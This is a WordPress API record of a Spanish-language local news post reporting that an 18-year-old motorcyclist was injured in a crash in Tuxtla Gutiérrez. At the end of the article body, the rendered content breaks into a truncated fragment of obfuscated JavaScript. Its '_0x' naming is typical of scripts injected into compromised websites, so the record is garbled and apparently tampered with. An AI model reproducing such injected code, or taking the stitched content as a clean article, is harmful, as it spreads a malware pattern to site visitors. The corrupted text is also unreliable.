{"id":16615,"date":"2024-07-10T01:19:17","date_gmt":"2024-07-10T01:19:17","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16615"},"modified":"2024-07-10T01:19:18","modified_gmt":"2024-07-10T01:19:18","slug":"motociclista-resulta-herido-en-aparatoso-accidente","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16615","title":{"rendered":"Motociclista resulta herido en aparatoso accidente"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"16616\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720574264973-1024x576.jpg\" alt=\"\" class=\"wp-image-16616\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720574264973-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720574264973-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720574264973-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720574264973.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"16617\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720574267379-1024x576.jpg\" alt=\"\" class=\"wp-image-16617\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720574267379-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720574267379-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720574267379-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720574267379.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"16618\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720574262263-1024x576.jpg\" alt=\"\" class=\"wp-image-16618\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720574262263-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720574262263-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720574262263-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720574262263.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 9 de julio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un joven motociclista de 18 a\u00f1os de edad, result\u00f3 con fractura en la pierna izquierda y m\u00faltiples heridas en el cuerpo luego de sufrir un fuerte accidente de tr\u00e1nsito en la zona Oriente de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, Cristofer de 18 a\u00f1os de edad, circulaba en una vento de color gris sobre el Bulevar \u00c1ngel Albino Corzo de Oriente a Poniente cuando de manera repentina un Honda Civic le hizo corte de circulaci\u00f3n al girar en un retorno.<\/p>\n\n\n\n<p>Por el impacto sali\u00f3 volando y se estrell\u00f3 contra el pavimento.<\/p>\n\n\n\n<p>Por varios minutos estuvo tirado esperando la respuesta de los cuerpos de auxilio y finalmente una ambulancia de la Cruz Roja Mexicana traslad\u00f3 al lesionado a un hospital particular.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 9 de julio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un joven motociclista de 18 a\u00f1os de edad, result\u00f3 con fractura en la pierna izquierda y m\u00faltiples heridas en el cuerpo luego de sufrir un fuerte accidente de tr\u00e1nsito en la zona Oriente de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que, Cristofer de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16616,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-16615","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16615","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16615"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16615\/revisions"}],"predecessor-version":[{"id":16619,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16615\/revisions\/16619"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16616"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16615"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16615"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16615"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}